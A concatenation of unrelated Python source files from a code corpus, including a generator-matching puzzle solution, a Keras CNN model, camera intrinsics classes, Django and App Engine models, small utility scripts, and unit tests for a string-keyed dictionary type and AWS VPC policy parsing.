""" Judge of the generators """
def __init__(self, generators, pair_count):
self.gen_a, self.gen_b = generators
self.pair_count = pair_count
def process(self):
""" Judge the values of the generators """
matched = 0
for index in range(self.pair_count):
if (index % 1000000) == 0:
print(index)
if self.compare(next(self.gen_a), next(self.gen_b)):
matched += 1
return matched
@staticmethod
def compare(val_1, val_2):
""" Compare the lowest 16 bits of the values """
return (val_1 & 0xffff) == (val_2 & 0xffff)
def read_data(data):
""" Parse the input data """
return [int(line[line.rfind(" "):]) for line in data.split('\n')]
def solution(data):
""" Solution to the problem """
val_a, val_b = read_data(data)
gen_a = Generator(16807, val_a, 'A')
gen_b = Generator(48271, val_b, 'B')
pair_count = 40000000
return Judge([gen_a, gen_b], pair_count).process()
if __name__ == "__main__":
PARSER = ArgumentParser()
PARSER.add_argument("--input", dest='input', action='store_true')
PARSER.add_argument("--test")
ARGS = PARSER.parse_args()
if ARGS.input:
with(open('input.txt', 'r')) as input_file:
print(solution(input_file.read()))
elif ARGS.test:
print(solution(str(ARGS.test)))
else:
DEBUG = """Generator A starts with 65
Generator B starts with 8921"""
print(solution(DEBUG))
| StarcoderdataPython |
9686840 | <gh_stars>0
#!/usr/bin/env python
def fact(n):
m = 1
for i in range(1, n+1):
m *= i
return m
if __name__ == '__main__':
number = int(input('Input a small number: '))
print(fact(number))
| StarcoderdataPython |
11324747 |
from rul_pm.models.keras.keras import KerasTrainableModel
from tensorflow.keras import Input, Model, optimizers
from tensorflow.keras.layers import (Concatenate, Conv2D, Dense, Dropout,
Flatten, Permute, Reshape)
class MVCNN(KerasTrainableModel):
"""
Model presented in Remaining useful life estimation in prognostics using deep convolution neural networks
Deafult parameters reported in the article
Number of filters: 10
Window size: 30/20/30/15
Filter length: 10
Neurons in fully-connected layer 100
Dropout rate 0.5
batch_size = 512
Parameters
-----------
n_filters : int
filter_size : int
window: int
batch_size: int
step: int
transformer
shuffle
models_path
patience: int = 4
cache_size: int = 30
"""
def __init__(self,
shape: tuple,
dropout: float,
window: int,
batch_size: int,
step: int, transformer,
shuffle, models_path,
patience: int = 4,
cache_size: int = 30,
**kwargs):
super().__init__(window,
batch_size,
step,
transformer,
shuffle,
models_path,
patience=patience,
cache_size=cache_size,
**kwargs)
self.shape = shape
self.dropout = dropout
def compile(self):
self.compiled = True
self.model.compile(
loss=self.loss,
optimizer=optimizers.Adam(lr=self.learning_rate,
beta_1=0.85,
beta_2=0.9,
epsilon=0.001,
amsgrad=True),
metrics=self.metrics)
def build_model(self):
n_features = self.transformer.n_features
input = Input(shape=(self.window, n_features))
x = input
x = Permute((2, 1))(x)
x = Reshape((self.shape[0], self.shape[1], self.window))(x)
x = Conv2D(self.window, (1, 1), activation='relu', padding='same')(x)
x1 = Conv2D(self.window, (2, 2), activation='relu', padding='same')(x)
x1 = Conv2D(self.window, (2, 2), activation='relu', padding='same')(x1)
x2 = Conv2D(self.window, (3, 3), activation='relu', padding='same')(x)
x2 = Conv2D(self.window, (3, 3), activation='relu', padding='same')(x2)
x3 = Conv2D(self.window, (5, 5), activation='relu', padding='same')(x)
x3 = Conv2D(self.window, (5, 5), activation='relu', padding='same')(x3)
x = Concatenate(axis=1)([x, x1, x2, x3])
x = Conv2D(self.window, self.shape)(x)
x = Flatten()(x)
x = Dense(100, activation='relu')(x)
x = Dropout(self.dropout)(x)
x = Dense(100, activation='relu')(x)
x = Dropout(self.dropout)(x)
output = Dense(1)(x)
model = Model(
inputs=[input],
outputs=[output],
)
return model
@property
def name(self):
return "MVCNN"
| StarcoderdataPython |
3493107 | from abc import ABC, abstractmethod
import numpy as np
class Intrinsics(ABC):
@property
@abstractmethod
def f_x(self) -> np.float32:
pass
@property
@abstractmethod
def f_y(self) -> np.float32:
pass
@property
@abstractmethod
def c_x(self) -> np.float32:
pass
@property
@abstractmethod
def c_y(self) -> np.float32:
pass
@property
@abstractmethod
def height(self) -> int:
pass
@property
@abstractmethod
def width(self) -> int:
pass
@property
def K(self) -> np.ndarray:
return np.array([[self.f_x, 0, self.c_x, 0],
[0, self.f_y, self.c_y, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]], dtype='float32')
@property
def normalized_K(self):
K = self.K
K[0, :] /= self.width
K[1, :] /= self.height
return K
class CylindricalIntrinsics(Intrinsics):
@property
def height(self) -> int:
return 1024
@property
def width(self) -> int:
return 2048
@property
def f_x(self) -> np.float32:
return np.float32(325.949323452201668)
@property
def c_x(self) -> np.float32:
return np.float32(1024.000000000000000)
@property
def f_y(self) -> np.float32:
return np.float32(1023.000000000000000)
@property
def c_y(self) -> np.float32:
return np.float32(511.500000000000000)
class SphericalIntrinsics(Intrinsics):
@property
def height(self) -> int:
return 1024
@property
def width(self) -> int:
return 2048
@property
def f_x(self) -> np.float32:
return np.float32(325.949323452201668)
@property
def c_x(self) -> np.float32:
return np.float32(1024.000000000000000)
@property
def f_y(self) -> np.float32:
return np.float32(325.949323452201668)
@property
def c_y(self) -> np.float32:
return np.float32(512.000000000000000)
class PinholeIntrinsics(Intrinsics):
@property
def f_x(self) -> np.float32:
return np.float32(322.2142583720755)
@property
def f_y(self) -> np.float32:
return np.float32(322.2142583720755)
@property
def c_x(self) -> np.float32:
return np.float32(384.0)
@property
def c_y(self) -> np.float32:
return np.float32(384.0)
@property
def height(self) -> int:
return 768
@property
def width(self) -> int:
return 768
@property
def fov(self) -> int:
return 100
class Pinhole90Intrinsics(Intrinsics):
@property
def f_x(self) -> np.float32:
return np.float32(384.0)
@property
def f_y(self) -> np.float32:
return np.float32(384.0)
@property
def c_x(self) -> np.float32:
return np.float32(384.0)
@property
def c_y(self) -> np.float32:
return np.float32(384.0)
@property
def height(self) -> int:
return 768
@property
def width(self) -> int:
return 768
@property
def fov(self) -> int:
return 90
| StarcoderdataPython |
216208 | TRAINING_FILE_ORIG = '../input/adult.csv'
TRAINING_FILE = '../input/adult_folds.csv'
| StarcoderdataPython |
12803939 | <reponame>gmc-norr/scout
import logging
import click
from flask.cli import with_appcontext
from scout.server.extensions import store
LOG = logging.getLogger(__name__)
@click.command("institutes", short_help="Display institutes")
@click.option("-i", "--institute-id", help="What institute to show")
@click.option("--json", help="Show json format", is_flag=True)
@with_appcontext
def institutes(institute_id, json):
"""Show all institutes in the database"""
LOG.info("Running scout view institutes")
adapter = store
if institute_id:
institute_objs = []
institute_obj = adapter.institute(institute_id)
if not institute_obj:
LOG.info("Institute %s does not exist", institute_id)
return
institute_objs.append(institute_obj)
else:
institute_objs = [ins_obj for ins_obj in adapter.institutes()]
if len(institute_objs) == 0:
click.echo("No institutes found")
raise click.Abort()
header = ""
if not json:
for key in institute_objs[0].keys():
header = header + "{0}\t".format(key)
click.echo(header)
for institute_obj in institute_objs:
if json:
click.echo(institute_obj)
continue
row = ""
for value in institute_obj.values():
row = row + "{0}\t".format(value)
click.echo(row)
| StarcoderdataPython |
5155110 | <gh_stars>0
from six import string_types
from django import forms
from django.core.exceptions import ValidationError
from collections import OrderedDict
from .registries import user_preferences_registry
from ..forms import (
SinglePerInstancePreferenceForm,
preference_form_builder,
PreferenceForm
)
from ..exceptions import NotFoundInRegistry
from .models import UserPreferenceModel
class UserSinglePreferenceForm(SinglePerInstancePreferenceForm):
class Meta:
model = UserPreferenceModel
fields = SinglePerInstancePreferenceForm.Meta.fields
def user_preference_form_builder(instance, preferences=[], **kwargs):
"""
A shortcut :py:func:`preference_form_builder(UserPreferenceForm, preferences, **kwargs)`
:param user: a :py:class:`django.contrib.auth.models.User` instance
"""
return preference_form_builder(
UserPreferenceForm,
preferences,
model={'instance': instance},
**kwargs)
class UserPreferenceForm(PreferenceForm):
registry = user_preferences_registry
| StarcoderdataPython |
11286515 | import airlock
from . import emails
from . import sync
from . import messages
from . import models
from google.appengine.datastore import datastore_query
from google.appengine.ext import ndb
from google.appengine.ext.ndb import msgprop
from protorpc import protojson
import csv
import io
import json
import logging
PER_PAGE = 200
class User(models.Model, airlock.User):
email = ndb.StringProperty()
_message_class = messages.UserMessage
def to_message(self):
message = self._message_class()
message.email = self.email
return message
class Approval(models.BaseResourceModel):
_message_class = messages.ApprovalMessage
created = ndb.DateTimeProperty(auto_now_add=True)
form = msgprop.MessageProperty(
messages.ApprovalFormMessage, indexed_fields=['folders'])
user_key = ndb.KeyProperty()
user = ndb.StructuredProperty(User)
domain = ndb.StringProperty()
domain = ndb.StringProperty()
updated_by_key = ndb.KeyProperty()
updated_by = ndb.StructuredProperty(User)
status = msgprop.EnumProperty(messages.Status, default=messages.Status.PENDING)
updated = ndb.DateTimeProperty(auto_now=True)
_csv_header = [
'company',
'company_email',
'company_type',
'country',
'created',
'email',
'email_opt_in',
'first_name',
'folders',
'job_title',
'internal_contact_email',
'justification',
'last_name',
'region',
]
def to_message(self):
message = self._message_class()
message.created = self.created
message.ident = self.ident
if self.user:
message.user = self.user.to_message()
elif self.user_key:
ent = self.user_key.get()
if ent:
message.user = ent.to_message()
# TODO: Remove this.
embedded_user = User(**ent.to_dict())
self.user = embedded_user
try:
self.put()
except:
logging.error("Couldn't migrate legacy user.")
message.status = self.status
message.updated = self.updated
message.domain = self.domain
try:
message.form = self.form
except:
logging.error("Couldn't decode form.")
if self.updated_by:
message.updated_by = self.updated_by.to_message()
message.domain = self.domain
return message
@classmethod
def get(cls, user):
query = cls.query()
query = query.filter(cls.user_key == user.key)
result = query.get()
if result:
return result
query = cls.query()
query = query.filter(cls.user.email == user.email)
result = query.get()
return result
def update(self, message, updated_by):
return self._update(message.form, updated_by)
def _update(self, form, updated_by):
self.form = form
if self.form.folders:
self.form.folders = list(set(self.form.folders))
embedded_user = User(**updated_by.to_dict())
self.updated_by = embedded_user
self.updated_by_key = updated_by.key
self.put()
return self
@classmethod
def get_or_create(cls, form, user, send_email=True,
created_by=None, status=None):
ent = cls.get(user)
if ent:
if form:
ent._update(form, created_by)
return ent
return cls.create(form, user, email=send_email,
created_by=created_by, status=status)
@classmethod
def create(cls, form, user, email=True, created_by=None,
status=None):
embedded_user = User(**user.to_dict())
ent = cls(user_key=user.key, user=embedded_user, form=form,
status=status)
if created_by:
ent.updated_by = User(**created_by.to_dict())
ent.updated_by_key = created_by.key
ent.put()
if email:
emailer = emails.Emailer(ent)
emailer.send_created_to_user()
emailer.send_created_to_admins()
return ent
@classmethod
def create_and_approve(cls, message, user, created_by):
ent = cls.get_or_create(message, user, send_email=False, created_by=created_by)
ent.approve(created_by, email=False)
return ent
def add_folders(self, folders):
for folder in folders:
if folder not in self.form.folders:
self.form.folders.append(folder)
self.put()
def remove_folders(self, folders):
for folder in folders:
if folder in self.form.folders:
self.form.folders.remove(folder)
self.put()
@classmethod
def search(cls, cursor=None, email=None, limit=None):
start_cursor = datastore_query.Cursor(urlsafe=cursor) if cursor else None
query = cls.query()
if email:
query = query.order(cls.user.email)
query = query.filter(cls.user.email == email)
query = query.order(-cls.created)
results, next_cursor, has_more = query.fetch_page(
limit or PER_PAGE, start_cursor=start_cursor)
return (results, next_cursor, has_more)
def approve(self, updated_by, email=True):
self.status = messages.Status.APPROVED
embedded_user = User(**updated_by.to_dict())
self.updated_by = embedded_user
self.updated_by_key = updated_by.key
self.put()
if email:
emailer = emails.Emailer(self)
emailer.send_approved_to_user()
def reject(self, updated_by, email=True):
self.status = messages.Status.REJECTED
embedded_user = User(**updated_by.to_dict())
self.updated_by = embedded_user
self.updated_by_key = updated_by.key
self.put()
if email:
emailer = emails.Emailer(self)
emailer.send_rejected_to_user()
@classmethod
def approve_multi(cls, approval_messages, updated_by, send_email=False):
ents = cls.get_multi(approval_messages)
for ent in ents:
ent.approve(updated_by, email=send_email)
return ents
@classmethod
def reject_multi(cls, approval_messages, updated_by, send_email=False):
ents = cls.get_multi(approval_messages)
for ent in ents:
ent.reject(updated_by, email=send_email)
return ents
@classmethod
def list_approvals_for_user(cls, user):
query = cls.query()
query = query.filter(ndb.OR(
cls.user.email == user.email,
cls.user_key == user.key))
results = query.fetch()
if results is None:
return []
return results
@classmethod
def list_approved_folders_for_user(cls, user):
result = cls.get(user)
approved_folders = set()
if not result:
return approved_folders
if result.status != messages.Status.APPROVED:
return approved_folders
approved_folders |= set(result.form.folders)
return approved_folders
@classmethod
def user_has_access(cls, user):
ents = cls.list_approvals_for_user(user)
for ent in ents:
if ent.status == messages.Status.APPROVED:
return True
@property
def serialized_form(self):
return json.loads(protojson.encode_message(self.form))
@classmethod
def to_csv(cls):
header = cls._csv_header
ents, _, _ = cls.search(limit=5000)
rows = []
for ent in ents:
encoded_form = None
try:
ent.form = ent.form or messages.ApprovalFormMessage()
encoded_form = json.loads(protojson.encode_message(ent.form))
except:
logging.error("Couldn't decode form.")
row = json.loads(protojson.encode_message(ent.to_message()))
row['email'] = ent.user.email
if 'email_opt_in' not in row:
row['email_opt_in'] = False
for key in row.keys():
if key not in header:
del row[key]
if encoded_form:
row.update(encoded_form)
for key in row:
if isinstance(row[key], unicode):
row[key] = row[key].encode('utf-8')
rows.append(row)
if not rows:
return ''
fp = io.BytesIO()
writer = csv.DictWriter(fp, header)
writer.writeheader()
writer.writerows(rows)
fp.seek(0)
return fp.read()
@classmethod
def decode_form(cls, form_dict):
encoded_message = json.dumps(form_dict)
return protojson.decode_message(
messages.ApprovalFormMessage,
encoded_message)
@classmethod
def count(cls):
query = cls.query()
return query.count()
@property
def folders(self):
from . import folders
return [folders.Folder.get(ident) for ident in self.form.folders]
| StarcoderdataPython |
9731656 | <reponame>kamira/DiscordBOT
import discord
from discord.ext import commands
from core.classes import Cog_Extension
class Ping(Cog_Extension):
@commands.command()
async def ping(self, ctx):
await ctx.send(f"Bot latency: {self.bot.latency * 1000:0.2f} ms")
def setup(bot):
bot.add_cog(Ping(bot))
| StarcoderdataPython |
1614081 | import math
co = float(input('\033[34mComprimento do cateto oposto: '))
ca = float(input('\033[35mComprimento do cateto adjacente: '))
hi = math.hypot(co, ca)
print('\033[mA hipotenusa vai medir %.2f' % hi)
| StarcoderdataPython |
4956284 | <gh_stars>0
def test_given_ruby_gems_are_installed(host):
gems = ['pod', 'xcpretty', 'bundler', 'fastlane']
for gem in gems:
assert host.exists(gem)
def test_pod_versions(host):
assert host.run("pod --version").stdout.startswith('1.10.1')
assert host.run("xcpretty --version").stdout.startswith('0.3.0')
assert host.run("bundler --version").stdout.startswith('Bundler version 2.1.4')
assert host.run("gem list | grep fastlane | tail -1").stdout.startswith('fastlane (2.166.0')
| StarcoderdataPython |
5060663 | <gh_stars>0
from django.db import models
from materials.models import *
class Supplier(models.Model):
s_name = models.CharField(max_length=100)
s_phone = models.CharField(max_length=14)
date = models.DateTimeField(auto_now_add=True)
materials = models.ForeignKey(Material, on_delete=models.CASCADE)
def save_supplier(self):
self.save()
def delete_supplier(self):
self.delete()
@classmethod
def update_supplier(cls,id,new_name):
cls.objects.filter(pk = id).update(s_name=new_name)
new_name_object = cls.objects.get(s_name = new_name)
new_name = new_name_object.name
return new_name
def __str__(self):
return f'{self.s_name}'
class Meta:
ordering = ['-date']
| StarcoderdataPython |
3243286 | <filename>week6/lecture11/subsets.py
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 21 22:34:32 2016
@author: ericgrimson
"""
def genSubsets(L):
res = []
if len(L) == 0:
return [[]] #list of empty list
smaller = genSubsets(L[:-1]) # all subsets without last element
extra = L[-1:] # create a list of just last element
new = []
for small in smaller:
new.append(small+extra) # for all smaller solutions, add one with last element
return smaller+new # combine those with last element and those without
test = [1,2,3,4]
super = genSubsets(test)
| StarcoderdataPython |
3241486 | <reponame>my-aws-org/cloudiscovery<gh_stars>0
from unittest import TestCase
from unittest.mock import MagicMock
from provider.vpc.command import check_ipvpc_inpolicy
class Test(TestCase):
def test_check_ipvpc_inpolicy(self):
vpce = {"VpcEndpoints": [{"VpcEndpointId": "vpce-1234abcd", "VpcId": "dummy"}]}
policy = """
{"Version":"2012-10-17","Id":"arn:queue","Statement":
[{"Effect":"Allow","Principal":"*","Action":"SQS:*","Resource":"arn:queue"},
{"Effect":"Allow","Principal":"*","Action":"sqs:*","Resource":"arn:queue","Condition":
{"StringEquals":{"aws:sourceVpce":"vpce-1234abcd"}}}]}
"""
vpc_options = MagicMock()
vpc_options.vpc_id = "dummy"
vpc_options.client.return_value.describe_vpc_endpoints.return_value = vpce
result = check_ipvpc_inpolicy(policy, vpc_options)
self.assertTrue("vpce-1234abcd" in result)
def test_check_vpce_inpolicy(self):
subnets = {
"Subnets": [
{
"CidrBlock": "10.0.64.0/18",
"SubnetId": "subnet-123",
"VpcId": "dummy",
}
]
}
policy = """
{"Version":"2012-10-17","Id":"arn:queue","Statement":
[{"Effect":"Allow","Principal":"*","Action":"SQS:*","Resource":"arn:queue"},
{"Effect":"Allow","Principal":"*","Action":"sqs:*","Resource":"arn:queue","Condition":
{"StringEquals":{"aws:sourceIp": "10.0.0.0/16"}}}]}
"""
vpc_options = MagicMock()
vpc_options.vpc_id = "dummy"
vpc_options.client.return_value.describe_subnets.return_value = subnets
result = check_ipvpc_inpolicy(policy, vpc_options)
self.assertTrue("10.0.0.0/16" in result)
self.assertTrue("10.0.64.0/18" in result)
self.assertTrue("subnet-123" in result)
| StarcoderdataPython |
122692 | <reponame>tvanslyke/strdict
import collections
import collections.abc
import gc
import random
import string
import sys
import unittest
import weakref
from StringDict import strdict
class DictTest(unittest.TestCase):
def test_invalid_keyword_arguments(self):
class Custom(strdict):
pass
Custom({'': 1})
for invalid in {1 : 2}, dict({1 : 2}):
with self.assertRaises(TypeError):
strdict(**invalid)
with self.assertRaises(TypeError):
strdict({}).update(**invalid)
def test_constructor(self):
self.assertEqual(strdict(), strdict({}))
self.assertIsNot(strdict(), strdict({}))
def test_bool(self):
self.assertIs(not strdict({}), True)
self.assertTrue(strdict({"": None}))
self.assertIs(bool(strdict({})), False)
self.assertIs(bool(strdict({"": 2})), True)
def test_keys(self):
d = strdict({})
self.assertEqual(set(d.keys()), set())
d = strdict({'a': 1, 'b': 2})
k = d.keys()
self.assertEqual(set(k), {'a', 'b'})
self.assertIn('a', k)
self.assertIn('b', k)
self.assertIn('a', d)
self.assertIn('b', d)
self.assertRaises(TypeError, d.keys, None)
self.assertEqual(repr(strdict(a=1).keys()), "['a']")
def test_values(self):
d = strdict({})
self.assertEqual(set(d.values()), set())
d = {'1':2}
self.assertEqual(set(d.values()), {2})
self.assertRaises(TypeError, d.values, None)
self.assertEqual(repr(strdict(a=1).values()), "[1]")
def test_items(self):
d = strdict({})
self.assertEqual(set(d.items()), set())
d = {'1':2}
self.assertEqual(set(d.items()), {('1', 2)})
self.assertRaises(TypeError, d.items, None)
self.assertEqual(repr(strdict(a=1).items()), "[('a', 1)]")
def test_contains(self):
d = strdict({})
self.assertNotIn('a', d)
self.assertFalse('a' in d)
self.assertTrue('a' not in d)
d = {'a': 1, 'b': 2}
self.assertIn('a', d)
self.assertIn('b', d)
self.assertNotIn('c', d)
self.assertRaises(TypeError, d.__contains__)
def test_len(self):
d = strdict({})
self.assertEqual(len(d), 0)
d = {'a': 1, 'b': 2}
self.assertEqual(len(d), 2)
def test_getitem(self):
d = {'a': 1, 'b': 2}
self.assertEqual(d['a'], 1)
self.assertEqual(d['b'], 2)
d['c'] = 3
d['a'] = 4
self.assertEqual(d['c'], 3)
self.assertEqual(d['a'], 4)
del d['b']
self.assertEqual(d, {'a': 4, 'c': 3})
self.assertRaises(TypeError, d.__getitem__)
class Exc(Exception): pass
class BadHash(str):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 0
x = BadHash()
d[x] = 42
x.fail = True
self.assertRaises(Exc, d.__getitem__, x)
def test_clear(self):
d = strdict({'1':1, '2':2, '3':3})
d.clear()
self.assertEqual(d, strdict({}))
self.assertRaises(TypeError, d.clear, None)
def test_update(self):
d = strdict({})
d.update({'1':100})
d.update(strdict({'2':20}))
d.update({'1':1, '2':2, '3':3})
self.assertEqual(d, {'1':1, '2':2, '3':3})
d.update()
self.assertEqual(d, {'1':1, '2':2, '3':3})
self.assertRaises((TypeError, AttributeError), d.update, None)
class SimpleUserDict:
def __init__(self):
self.d = {'1':1, '2':2, '3':3}
def keys(self):
return self.d.keys()
def __getitem__(self, i):
return self.d[i]
def items(self):
return self.d.items()
d.clear()
d.update(SimpleUserDict())
self.assertEqual(d, {'1':1, '2':2, '3':3})
class Exc(Exception): pass
d.clear()
class FailingUserDict:
def items(self):
raise Exc
def __getitem__(self, key):
return key
self.assertRaises(Exc, d.update, FailingUserDict())
class FailingUserDict:
def items(self):
class BogonIter:
def __init__(self):
self.i = 1
def __iter__(self):
return self
def __next__(self):
if self.i:
self.i = 0
return ('a', self.i)
raise Exc
return BogonIter()
def __getitem__(self, key):
return key
self.assertRaises(Exc, d.update, FailingUserDict())
class FailingUserDict:
def keys(self):
class BogonIter:
def __init__(self):
self.i = ord('a')
def __iter__(self):
return self
def __next__(self):
if self.i <= ord('z'):
rtn = chr(self.i)
self.i += 1
return rtn
raise StopIteration
return BogonIter()
def __getitem__(self, key):
raise Exc
self.assertRaises(Exc, d.update, FailingUserDict())
class badseq(object):
def __iter__(self):
return self
def __next__(self):
raise Exc()
self.assertRaises(Exc, strdict({}).update, badseq())
self.assertRaises(ValueError, strdict({}).update, [('1', '2', '3')])
def test_copy(self):
d = strdict({'1': 1, '2': 2, '3': 3})
self.assertIsNot(d.copy(), d)
self.assertEqual(d.copy(), d)
self.assertEqual(d.copy(), {'1': 1, '2': 2, '3': 3})
copy = d.copy()
d['4'] = 4
self.assertNotEqual(copy, d)
self.assertEqual(strdict({}).copy(), strdict({}))
self.assertRaises(TypeError, d.copy, None)
def test_copy_fuzz(self):
for dict_size in [10, 100, 1000, 10000, 100000]:
dict_size = random.randrange(
dict_size // 2, dict_size + dict_size // 2)
with self.subTest(dict_size=dict_size):
d = strdict({})
for i in range(dict_size):
d[str(i)] = i
d2 = d.copy()
self.assertIsNot(d2, d)
self.assertEqual(d, d2)
d2['key'] = 'value'
self.assertNotEqual(d, d2)
self.assertEqual(len(d2), len(d) + 1)
def test_copy_maintains_tracking(self):
class A:
pass
key = A()
for d in (strdict({}), strdict({'a': 1}), strdict({repr(key): 'val'})):
d2 = d.copy()
self.assertEqual(gc.is_tracked(d), gc.is_tracked(d2))
def test_copy_noncompact(self):
# Dicts don't compact themselves on del/pop operations.
# Copy will use a slow merging strategy that produces
# a compacted copy when roughly 33% of dict is a non-used
# keys-space (to optimize memory footprint).
# In this test we want to hit the slow/compacting
# branch of dict.copy() and make sure it works OK.
d = strdict({str(k): k for k in range(1000)})
assert '1' in d
assert '0' in d
for k in range(950):
del d[str(k)]
d2 = d.copy()
self.assertEqual(d2, d)
def test_get(self):
d = strdict({})
self.assertIs(d.get('c'), None)
self.assertEqual(d.get('c', 3), 3)
d = {'a': 1, 'b': 2}
self.assertIs(d.get('c'), None)
self.assertEqual(d.get('c', 3), 3)
self.assertEqual(d.get('a'), 1)
self.assertEqual(d.get('a', 3), 1)
self.assertRaises(TypeError, d.get)
self.assertRaises(TypeError, d.get, None, None, None)
def test_setdefault(self):
# dict.setdefault()
d = strdict({})
self.assertIs(d.setdefault('key0'), None)
d.setdefault('key0', [])
self.assertIs(d.setdefault('key0'), None)
d.setdefault('key', []).append(3)
self.assertEqual(d['key'][0], 3)
d.setdefault('key', []).append(4)
self.assertEqual(len(d['key']), 2)
self.assertRaises(TypeError, d.setdefault)
class Exc(Exception): pass
class BadHash(str):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 42
x = BadHash()
d[x] = 42
x.fail = True
try:
d.setdefault(x, [])
except Exc:
self.fail("setdefault() called custom hash, but should have used str.__hash__()")
def test_setdefault_atomic(self):
# Issue #13521: setdefault() calls __hash__ and __eq__ only once.
class Hashed(str):
def __init__(self, *args, **kwargs):
self.hash_count = 0
self.eq_count = 0
def __hash__(self):
self.hash_count += 1
return 42
def __eq__(self, other):
self.eq_count += 1
return super(Hashed, self).__eq__(other)
hashed1 = Hashed('s')
y = strdict({hashed1: 5})
hashed2 = Hashed('r')
y.setdefault(hashed2, [])
self.assertEqual(hashed1.hash_count, 1)
self.assertEqual(hashed2.hash_count, 0)
self.assertEqual(hashed1.eq_count + hashed2.eq_count, 0)
def test_setitem_atomic_at_resize(self):
class Hashed(str):
def __init__(self, *args, **kwargs):
self.hash_count = 0
self.eq_count = 0
def __hash__(self):
self.hash_count += 1
return 42
def __eq__(self, other):
self.eq_count += 1
return super(Hashed, self).__eq__(other)
hashed1 = Hashed('s')
# 5 items
y = strdict({hashed1: 5, '0': 0, '1': 1, '2': 2, '3': 3})
hashed2 = Hashed('r')
# 6th item forces a resize
y[hashed2] = []
self.assertEqual(hashed1.hash_count, 1)
self.assertEqual(hashed2.hash_count, 0)
self.assertEqual(hashed1.eq_count + hashed2.eq_count, 0)
def test_popitem(self):
# dict.popitem()
for copymode in -1, +1:
# -1: b has same structure as a
# +1: b is a.copy()
for log2size in range(12):
size = 2**log2size
a = strdict({})
b = strdict({})
for i in range(size):
a[repr(i)] = str(i)
if copymode < 0:
b[repr(i)] = repr(i)
if copymode > 0:
b = a.copy()
for i in range(size):
ka, va = ta = a.popitem()
self.assertEqual(va, ka)
kb, vb = tb = b.popitem()
self.assertEqual(vb, kb)
self.assertFalse(copymode < 0 and ta != tb)
self.assertFalse(a)
self.assertFalse(b)
d = strdict({})
self.assertRaises(KeyError, d.popitem)
def test_pop(self):
# Tests for pop with specified key
d = strdict({})
k, v = 'abc', 'def'
d[k] = v
self.assertRaises(KeyError, d.pop, 'ghi')
self.assertEqual(d.pop(k), v)
self.assertEqual(len(d), 0)
self.assertRaises(KeyError, d.pop, k)
self.assertEqual(d.pop(k, v), v)
d[k] = v
self.assertEqual(d.pop(k, 1), v)
self.assertRaises(TypeError, d.pop)
class Exc(Exception): pass
class BadHash(str):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 42
x = BadHash()
d[x] = 42
x.fail = True
try:
d.pop(x)
except Exc:
self.fail("pop() called custom hash, but should have used str.__hash__()")
def test_mutating_lookup(self):
# changing dict during a lookup (issue #14417)
class NastyKey(bytearray):
mutate_dict = None
def __init__(self, *args, **kwargs):
super(NastyKey, self).__init__(*args, **kwargs)
def __hash__(self):
if NastyKey.mutate_dict:
mydict, key = NastyKey.mutate_dict
NastyKey.mutate_dict = None
del mydict[key]
return 0
key1 = NastyKey([1])
key2 = NastyKey([2])
d = {key1: 1}
NastyKey.mutate_dict = (d, key1)
d[key2] = 2
self.assertEqual(d, {key2: 2})
def test_repr(self):
d = strdict({})
self.assertEqual(repr(d), "strdict({})")
d['1'] = 2
self.assertEqual(repr(d), "strdict({'1': 2})")
d = strdict({})
d['1'] = d
self.assertEqual(repr(d), "strdict({'1': strdict({...})})")
class Exc(Exception): pass
class BadRepr(object):
def __repr__(self):
raise Exc()
d = {1: BadRepr()}
self.assertRaises(Exc, repr, d)
def test_repr_deep(self):
d = strdict({})
for i in range(sys.getrecursionlimit() + 100):
d = strdict({'1': d})
self.assertRaises(RecursionError, repr, d)
def test_eq(self):
self.assertEqual(strdict({}), strdict({}))
self.assertEqual(strdict({'1': 2}), {'1': 2})
self.assertEqual({'1': 2}, strdict({'1': 2}))
self.assertEqual(strdict({'1': 2}), strdict({'1': 2}))
class Exc(Exception): pass
class BadCmp(object):
def __eq__(self, other):
raise Exc()
d1 = {'1': BadCmp()}
d2 = {'1': 1}
with self.assertRaises(Exc):
d1 == d2
def test_keys_contained(self):
self.helper_keys_contained(lambda x: set(x.keys()))
self.helper_keys_contained(lambda x: set(x.items()))
def helper_keys_contained(self, fn):
# Test rich comparisons against dict key views, which should behave the
# same as sets.
empty = fn(strdict())
empty2 = fn(strdict())
smaller = fn(strdict({'1':1, '2':2}))
larger = fn(strdict({'1':1, '2':2, '3':3}))
larger2 = fn(strdict({'1':1, '2':2, '3':3}))
larger3 = fn(strdict({'4':1, '2':2, '3':3}))
self.assertTrue(smaller < larger)
self.assertTrue(smaller <= larger)
self.assertTrue(larger > smaller)
self.assertTrue(larger >= smaller)
self.assertFalse(smaller >= larger)
self.assertFalse(smaller > larger)
self.assertFalse(larger <= smaller)
self.assertFalse(larger < smaller)
self.assertFalse(smaller < larger3)
self.assertFalse(smaller <= larger3)
self.assertFalse(larger3 > smaller)
self.assertFalse(larger3 >= smaller)
# Inequality strictness
self.assertTrue(larger2 >= larger)
self.assertTrue(larger2 <= larger)
self.assertFalse(larger2 > larger)
self.assertFalse(larger2 < larger)
self.assertTrue(larger == larger2)
self.assertTrue(smaller != larger)
# There is an optimization on the zero-element case.
self.assertTrue(empty == empty2)
self.assertFalse(empty != empty2)
self.assertFalse(empty == smaller)
self.assertTrue(empty != smaller)
# With the same size, an elementwise compare happens
self.assertTrue(larger != larger3)
self.assertFalse(larger == larger3)
def test_dictview_set_operations_on_keys(self):
k1 = set({1:1, 2:2}.keys())
k2 = set({1:1, 2:2, 3:3}.keys())
k3 = set({4:4}.keys())
self.assertEqual(k1 - k2, set())
self.assertEqual(k1 - k3, {1,2})
self.assertEqual(k2 - k1, {3})
self.assertEqual(k3 - k1, {4})
self.assertEqual(k1 & k2, {1,2})
self.assertEqual(k1 & k3, set())
self.assertEqual(k1 | k2, {1,2,3})
self.assertEqual(k1 ^ k2, {3})
self.assertEqual(k1 ^ k3, {1,2,4})
def test_dictview_set_operations_on_items(self):
k1 = set({1:1, 2:2}.items())
k2 = set({1:1, 2:2, 3:3}.items())
k3 = set({4:4}.items())
self.assertEqual(k1 - k2, set())
self.assertEqual(k1 - k3, {(1,1), (2,2)})
self.assertEqual(k2 - k1, {(3,3)})
self.assertEqual(k3 - k1, {(4,4)})
self.assertEqual(k1 & k2, {(1,1), (2,2)})
self.assertEqual(k1 & k3, set())
self.assertEqual(k1 | k2, {(1,1), (2,2), (3,3)})
